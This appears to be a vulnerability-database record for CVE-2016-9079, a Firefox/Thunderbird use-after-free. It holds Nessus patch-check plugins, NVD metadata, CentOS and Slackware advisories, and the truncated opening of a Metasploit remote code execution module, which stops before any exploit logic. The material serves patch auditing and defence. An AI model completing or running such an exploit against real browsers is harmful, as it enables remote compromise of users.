rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-translations-other-50.0.2-131.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-45.5.1-70.92.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-buildsymbols-45.5.1-70.92.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-debuginfo-45.5.1-70.92.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-debugsource-45.5.1-70.92.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-devel-45.5.1-70.92.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-translations-common-45.5.1-70.92.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-translations-other-45.5.1-70.92.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libfreebl3-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libfreebl3-debuginfo-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libsoftokn3-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libsoftokn3-debuginfo-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-certs-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-certs-debuginfo-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-debuginfo-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-debugsource-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-devel-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-sysinit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-sysinit-debuginfo-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-tools-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mozilla-nss-tools-debuginfo-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libfreebl3-debuginfo-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libsoftokn3-debuginfo-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-debuginfo-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"mozilla-nss-debuginfo-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"mozilla-nss-sysinit-32bit-3.26.2-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"mozilla-nss-sysinit-debuginfo-32bit-3.26.2-94.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / MozillaFirefox-branding-upstream / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:18:27", "description": "The remote host is affected by the vulnerability described in GLSA-201701-15 (Mozilla Firefox, Thunderbird: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox and Thunderbird. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition via multiple vectors.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-04T00:00:00", "type": "nessus", "title": "GLSA-201701-15 : Mozilla Firefox, Thunderbird: Multiple vulnerabilities (SWEET32)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2804", "CVE-2016-2805", "CVE-2016-2806", "CVE-2016-2807", "CVE-2016-2808", "CVE-2016-2809", "CVE-2016-2810", "CVE-2016-2811", "CVE-2016-2812", "CVE-2016-2813", "CVE-2016-2814", "CVE-2016-2816", "CVE-2016-2817", "CVE-2016-2820", "CVE-2016-2827", "CVE-2016-2830", "CVE-2016-2835", "CVE-2016-2836", "CVE-2016-2837", "CVE-2016-2838", "CVE-2016-2839", "CVE-2016-5250", "CVE-2016-5251", "CVE-2016-5252", "CVE-2016-5253", "CVE-2016-5254", "CVE-2016-5255", "CVE-2016-5256", "CVE-2016-5257", "CVE-2016-5258", "CVE-2016-5259", "CVE-2016-5260", "CVE-2016-5261", "CVE-2016-5262", "CVE-2016-5263", "CVE-2016-5264", "CVE-2016-5265", "CVE-2016-5266", "CVE-2016-5267", "CVE-2016-5268", "CVE-2016-5270", "CVE-2016-5271", "CVE-2016-5272", "CVE-2016-5273", "CVE-2016-5274", "CVE-2016-5275", "CVE-2016-5276", "CVE-2016-5277", "CVE-2016-5278", "CVE-2016-5279", "CVE-2016-5280", "CVE-2016-5281", "CVE-2016-5282", "CVE-2016-5283", "CVE-2016-5284", "CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5293", "CVE-2016-5294", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079", "CVE-2016-9893", "CVE-2016-9895", "CVE-2016-9897", "CVE-2016-9898", "CVE-2016-9899", "CVE-2016-9900", "CVE-2016-9901", "CVE-2016-9902", "CVE-2016-9904", "CVE-2016-9905"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:firefox", "p-cpe:/a:gentoo:linux:firefox-bin", "p-cpe:/a:gentoo:linux:thunderbird", "p-cpe:/a:gentoo:linux:thunderbird-bin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201701-15.NASL", "href": "https://www.tenable.com/plugins/nessus/96276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201701-15.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96276);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2804\", \"CVE-2016-2805\", \"CVE-2016-2806\", \"CVE-2016-2807\", \"CVE-2016-2808\", \"CVE-2016-2809\", \"CVE-2016-2810\", \"CVE-2016-2811\", \"CVE-2016-2812\", \"CVE-2016-2813\", \"CVE-2016-2814\", \"CVE-2016-2816\", \"CVE-2016-2817\", \"CVE-2016-2820\", \"CVE-2016-2827\", \"CVE-2016-2830\", \"CVE-2016-2835\", \"CVE-2016-2836\", \"CVE-2016-2837\", \"CVE-2016-2838\", \"CVE-2016-2839\", \"CVE-2016-5250\", \"CVE-2016-5251\", \"CVE-2016-5252\", \"CVE-2016-5253\", \"CVE-2016-5254\", \"CVE-2016-5255\", \"CVE-2016-5256\", \"CVE-2016-5257\", \"CVE-2016-5258\", \"CVE-2016-5259\", \"CVE-2016-5260\", \"CVE-2016-5261\", \"CVE-2016-5262\", \"CVE-2016-5263\", \"CVE-2016-5264\", \"CVE-2016-5265\", \"CVE-2016-5266\", \"CVE-2016-5267\", \"CVE-2016-5268\", \"CVE-2016-5270\", \"CVE-2016-5271\", \"CVE-2016-5272\", \"CVE-2016-5273\", \"CVE-2016-5274\", \"CVE-2016-5275\", \"CVE-2016-5276\", \"CVE-2016-5277\", \"CVE-2016-5278\", \"CVE-2016-5279\", \"CVE-2016-5280\", \"CVE-2016-5281\", \"CVE-2016-5282\", \"CVE-2016-5283\", \"CVE-2016-5284\", \"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5293\", \"CVE-2016-5294\", \"CVE-2016-5296\", \"CVE-2016-5297\", \"CVE-2016-9064\", \"CVE-2016-9066\", \"CVE-2016-9074\", \"CVE-2016-9079\", \"CVE-2016-9893\", \"CVE-2016-9895\", \"CVE-2016-9897\", \"CVE-2016-9898\", \"CVE-2016-9899\", \"CVE-2016-9900\", \"CVE-2016-9901\", \"CVE-2016-9902\", \"CVE-2016-9904\", \"CVE-2016-9905\");\n script_xref(name:\"GLSA\", value:\"201701-15\");\n\n script_name(english:\"GLSA-201701-15 : Mozilla Firefox, Thunderbird: Multiple vulnerabilities (SWEET32)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201701-15\n(Mozilla Firefox, Thunderbird: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox and\n Thunderbird. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition via\n multiple vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201701-15\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Firefox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-45.6.0'\n All Firefox-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-45.6.0'\n All Thunderbird users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-45.6.0'\n All Thunderbird-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-45.6.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/04\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-client/thunderbird\", unaffected:make_list(\"ge 45.6.0\"), vulnerable:make_list(\"lt 45.6.0\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird-bin\", unaffected:make_list(\"ge 45.6.0\"), vulnerable:make_list(\"lt 45.6.0\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox\", unaffected:make_list(\"ge 45.6.0\"), vulnerable:make_list(\"lt 45.6.0\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox-bin\", unaffected:make_list(\"ge 45.6.0\"), vulnerable:make_list(\"lt 45.6.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Firefox / Thunderbird\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:21:49", "description": "A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows. This vulnerability affects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-11T21:29:00", "type": "cve", "title": "CVE-2016-9079", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2018-08-09T15:12:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:redhat:enterprise_linux_server:5.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:5.0", "cpe:/o:redhat:enterprise_linux:5.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:torproject:tor:-", "cpe:/o:redhat:enterprise_linux_server_eus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_desktop:5.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:redhat:enterprise_linux_server_eus:7.5"], "id": "CVE-2016-9079", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9079", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:torproject:tor:-:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2023-01-01T04:42:37", "description": "**CentOS Errata and Security Advisory** CESA-2016:2850\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es):\n\n* A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Thunderbird to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Thunderbird.\n(CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2016-December/071644.html\nhttps://lists.centos.org/pipermail/centos-announce/2016-December/071645.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2016-December/023294.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2016:2850", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-06T20:06:31", "type": "centos", "title": "thunderbird security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-08T12:12:59", "id": "CESA-2016:2850", "href": "https://lists.centos.org/pipermail/centos-announce/2016-December/071644.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-01T04:42:37", "description": "**CentOS Errata and Security Advisory** CESA-2016:2843\n\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es):\n\n* A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2016-December/071642.html\nhttps://lists.centos.org/pipermail/centos-announce/2016-December/071643.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2016-December/023273.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2016:2843", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-03T11:57:24", "type": "centos", "title": "firefox security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-03T15:22:05", "id": "CESA-2016:2843", "href": "https://lists.centos.org/pipermail/centos-announce/2016-December/071642.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "slackware": [{"lastseen": "2023-02-08T16:13:08", "description": "New mozilla-thunderbird packages are available for Slackware 14.1, 14.2,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/mozilla-thunderbird-45.5.1-i586-1_slack14.2.txz: Upgraded.\n This release contains security fixes and improvements.\n For more information, see:\n https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html\n https://vulners.com/cve/CVE-2016-9079\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-45.5.1-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-45.5.1-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-thunderbird-45.5.1-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-thunderbird-45.5.1-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-45.5.1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-45.5.1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 package:\n5482e6a44d9375c1eb19bea90e40feb2 mozilla-thunderbird-45.5.1-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n1f83b4ee45cc37db9548b46e454d8577 mozilla-thunderbird-45.5.1-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n098a46bb98e99dc58345e238f35a04cc mozilla-thunderbird-45.5.1-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nb31349a729b8ba7288beaa9f96ac09c0 mozilla-thunderbird-45.5.1-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n0dc77532e0f561d9e2c013755e2bbdbf xap/mozilla-thunderbird-45.5.1-i586-1.txz\n\nSlackware x86_64 -current package:\n345054ee5e5760c3a1760fb9b48e4f4a xap/mozilla-thunderbird-45.5.1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mozilla-thunderbird-45.5.1-i586-1_slack14.2.txz", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-01T09:00:42", "type": "slackware", "title": "[slackware-security] mozilla-thunderbird", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-01T09:00:42", "id": "SSA-2016-336-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.408458", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-04-12T19:44:14", "description": "This Metasploit module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.", "cvss3": {}, "published": "2017-01-24T00:00:00", "type": "zdt", "title": "Mozilla Firefox nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2017-01-24T00:00:00", "id": "1337DAY-ID-26792", "href": "https://0day.today/exploit/description/26792", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\n class MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 